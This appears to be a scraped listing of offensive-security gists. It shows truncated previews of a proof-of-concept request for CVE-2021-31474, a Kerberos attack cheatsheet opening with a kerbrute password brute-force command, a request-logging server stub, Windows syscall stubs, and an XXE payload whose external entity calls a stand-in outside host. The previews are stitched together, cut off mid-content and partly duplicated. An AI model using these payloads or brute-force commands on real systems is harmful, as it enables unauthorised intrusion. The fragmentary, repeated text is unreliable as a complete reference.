tree-chtsec

## PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              373 forks
            
          
              5 comments
            
          
              1085 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## server.py
#!/usr/bin/env python3
"""
License: MIT License
Copyright (c) 2023 Miel Donkers

Very simple HTTP server in python for logging requests
Usage::
    ./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

## nt_syscalls.md

      
              1 file
            
          
              3 forks
            
          
              0 comments
            
          
              22 stars
            
          
                wbenny
                / nt_syscalls.md
            
            
              Last active
              March 22, 2023 07:59
            
              
                Windows syscall stubs
              
          
    Windows system calls

...by stub

x86

Windows XP

B8 ?? ?? ?? ??                mov     eax, ??
BA 00 03 FE 7F                mov     edx, 7FFE0300h


## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
	POST /api/Action/TestAction HTTP/1.1
	Host: <target>
	Content-Length: 3978
	Accept: application/json, text/javascript, /; q=0.01
	X-XSRF-TOKEN: <token>
	X-Requested-With: XMLHttpRequest
	ViewLimitationID: 0
	User-Agent: Mozilla/5.0
	Content-Type: application/json; charset=UTF-8
	Cookie: <cookie>
	#!/usr/bin/env python3
	"""
	License: MIT License
	Copyright (c) 2023 Miel Donkers

	Very simple HTTP server in python for logging requests
	Usage::
	./server.py [<port>]
	"""
	from http.server import BaseHTTPRequestHandler, HTTPServer
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>